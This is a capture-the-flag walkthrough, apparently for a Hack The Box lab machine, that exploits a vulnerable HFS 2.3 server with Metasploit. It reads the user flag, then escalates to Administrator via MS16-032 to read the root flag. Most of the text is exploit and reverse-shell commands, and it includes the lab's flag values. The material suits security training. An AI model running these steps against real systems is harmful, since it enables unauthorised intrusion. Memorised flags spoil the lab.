As usual, let's start with nmap
nmap -sV -sC -p- 10.129.170.240
We can see it is using HFS 2.3. Let's google "HFS 2.3 exploit" and see if we find an exploit available.
We find an exploit on metasploit: https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/
Let's follow these steps in the article.
msfconsoleuse exploit/windows/http/rejetto_hfs_exec
show options
set RHOSTS 10.129.170.240set LHOST 10.10.14.21
exploit
getuid
sysinfo
shell
dir
We find a text file called user.txt.txt
Let's open using:
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
Congratulations! You got the user flag!
Let's now look for the root flag
cd ..cd ..dir
cd Administrator
Access is denied
Return to the meterpreter shell by typing:
exit
Privilege Escalation
Let's use Lester (local exploit suggestor) from Metasploit. This will scan the target for vulnervabilities.
To run Lester, we use:
run post/multi/recon/local_exploit_suggester
There are a couple of exploits we could use but I tried exploit/windows/local/bypassuac_eventvwr and it didn't work.
We will use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
But first let's look at the processes running using
ps
Let's migrate to explorer.exe with PID 1988
migrate 1988
background
This is giving us the session id which is 1 (we will need that later)
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show options
set SESSION 1set LHOST 10.10.14.21
exploit
shell
cd C:\Users\Administrator\Desktopdirtype root.txt
51ed1b36553c8461f4552c2e92b3eeed
Congratulations! You got the root flag!